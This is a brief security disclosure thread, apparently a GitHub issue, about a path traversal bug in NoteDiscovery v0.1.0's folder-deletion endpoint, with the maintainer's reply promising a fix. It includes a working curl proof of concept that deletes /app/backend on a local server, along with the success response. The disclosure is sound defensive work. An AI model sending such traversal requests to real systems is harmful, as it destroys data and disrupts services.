Path traversal on the `DELETE /folders/{folder_path:path}` endpoint

[d0gkiller87]

Description

https://github.com/gamosoft/NoteDiscovery/blob/v0.1.0/backend/utils.py#L130 missed a call to validate_path_security(), allowing authenticated users to delete directories outside the notes directory. Not much damage can be done besides maybe causing service interruptions though.

PoC

curl -v -X DELETE "http://127.0.0.1:8000/api/folders/%2fapp%2fbackend"

< HTTP/1.1 200 OK
< server: uvicorn
< content-length: 78
< content-type: application/json
<
* Connection #0 to host 127.0.0.1 left intact
{"success":true,"path":"/app/backend","message":"Folder deleted successfully"}%

[gamosoft]

I have just added a PR to fix this, thanks for letting me know! 😊